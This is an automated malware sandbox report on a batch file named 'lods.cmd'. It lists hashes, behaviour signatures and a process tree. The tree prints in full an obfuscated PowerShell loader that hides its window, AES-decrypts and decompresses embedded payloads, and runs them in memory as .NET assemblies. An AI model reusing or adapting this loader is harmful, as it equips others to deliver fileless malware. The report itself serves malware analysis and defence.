Resubmissions
15-02-2024 02:04
240215-chmlpaeg88 10Analysis
-
max time kernel
358s -
max time network
359s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system
submitted
15-02-2024 02:04
Static task
static1
Behavioral task
behavioral1
Sample
lods.cmd
Resource
win7-20231129-en
windows7-x64
4 signatures
600 seconds
Behavioral task
behavioral2
Sample
lods.cmd
Resource
win10v2004-20231222-en
windows10-2004-x64
13 signatures
600 seconds
General
-
Target
lods.cmd
-
Size
264KB
-
MD5
194118c43c65faad06bf5ff6cd9b52a2
-
SHA1
7bdf85b3968747acf21d37df5e56d54f8a0c7e62
-
SHA256
1a5ad9ae7b0dcdc2edb7e93556f2c59c84f113879df380d95835fb8ea3914ed8
-
SHA512
42a7d57520d68acfc79972e387cf6a9ca45b1159ee14ba1d6b4bc801d90d38e7eeb6dfd6aa3c039773cceb6d3a9223cc8459abd7661ae162b89644b6db8996b2
-
SSDEEP
6144:0ChPgq+rL7AAZG5R0Oscn3X/QOT31RvQ/3R:0uY105CO+aUR
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process
3040 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process
3040 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process
Token: SeDebugPrivilege 3040 powershell.exe
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target
PID 2872 wrote to memory of 2964 2872 cmd.exe 29
PID 2872 wrote to memory of 2964 2872 cmd.exe 29
PID 2872 wrote to memory of 2964 2872 cmd.exe 29
PID 2964 wrote to memory of 3020 2964 cmd.exe 31
PID 2964 wrote to memory of 3020 2964 cmd.exe 31
PID 2964 wrote to memory of 3020 2964 cmd.exe 31
PID 2964 wrote to memory of 3040 2964 cmd.exe 32
PID 2964 wrote to memory of 3040 2964 cmd.exe 32
PID 2964 wrote to memory of 3040 2964 cmd.exe 32
PID 2964 wrote to memory of 3040 2964 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.exe  cmd /c "C:\Users\Admin\AppData\Local\Temp\lods.cmd"  1⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\cmd.exe  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lods.cmd  2⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\lods.cmd';$yDpz='IKCWFnKCWFvoKCWFkeKCWF'.Replace('KCWF', ''),'RXWQleXWQladLXWQlineXWQlsXWQl'.Replace('XWQl', ''),'GeXvGNtXvGNCXvGNurrXvGNenXvGNtPXvGNrXvGNocXvGNesXvGNsXvGN'.Replace('XvGN', ''),'FrxAMfomBxAMfasxAMfe64xAMfStxAMfrxAMfinxAMfgxAMf'.Replace('xAMf', ''),'CrXNBTeaXNBTtXNBTeDXNBTecXNBTrypXNBTtXNBTorXNBT'.Replace('XNBT', ''),'CeDSsheDSsaneDSsgeDSseEeDSsxteDSseeDSsneDSssieDSsoneDSs'.Replace('eDSs', ''),'EnNMJVtNMJVryPNMJVoinNMJVtNMJV'.Replace('NMJV', ''),'DAdhwecAdhwompAdhwrAdhweAdhwssAdhw'.Replace('Adhw', ''),'SpWkTWlWkTWitWkTW'.Replace('WkTW', ''),'MCgUGaCgUGinCgUGMCgUGodCgUGuCgUGleCgUG'.Replace('CgUG', ''),'LoauLqjduLqj'.Replace('uLqj', ''),'TrZUBEanZUBEsfZUBEoZUBErmZUBEFZUBEinZUBEalZUBEBZUBEloZUBEckZUBE'.Replace('ZUBE', ''),'CopFJKYyFJKYToFJKY'.Replace('FJKY', ''),'ElLTAIeLTAImeLTAInLTAItAtLTAI'.Replace('LTAI', '');powershell -w hidden;function jErZG($xSDUT){$cRyDq=[System.Security.Cryptography.Aes]::Create();$cRyDq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cRyDq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cRyDq.Key=[System.Convert]::($yDpz[3])('nlftMe/+KZS0ywJx8vu78pDIl8AaOzKgZtZxqMq9lB8=');$cRyDq.IV=[System.Convert]::($yDpz[3])('qNVO13iwamE1laUPiVA0ow==');$ofBHL=$cRyDq.($yDpz[4])();$mDAXw=$ofBHL.($yDpz[11])($xSDUT,0,$xSDUT.Length);$ofBHL.Dispose();$cRyDq.Dispose();$mDAXw;}function agayp($xSDUT){$jmbnu=New-Object System.IO.MemoryStream(,$xSDUT);$wFcba=New-Object System.IO.MemoryStream;$adSek=New-Object System.IO.Compression.GZipStream($jmbnu,[IO.Compression.CompressionMode]::($yDpz[7]));$adSek.($yDpz[12])($wFcba);$adSek.Dispose();$jmbnu.Dispose();$wFcba.Dispose();$wFcba.ToArray();}$oFNMD=[System.IO.File]::($yDpz[1])([Console]::Title);$JFMmz=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 5).Substring(2))));$CdrWA=agayp (jErZG 
([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 6).Substring(2))));[System.Reflection.Assembly]::($yDpz[10])([byte[]]$CdrWA).($yDpz[6]).($yDpz[0])($null,$null);[System.Reflection.Assembly]::($yDpz[10])([byte[]]$JFMmz).($yDpz[6]).($yDpz[0])($null,$null); "3⤵PID:3020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-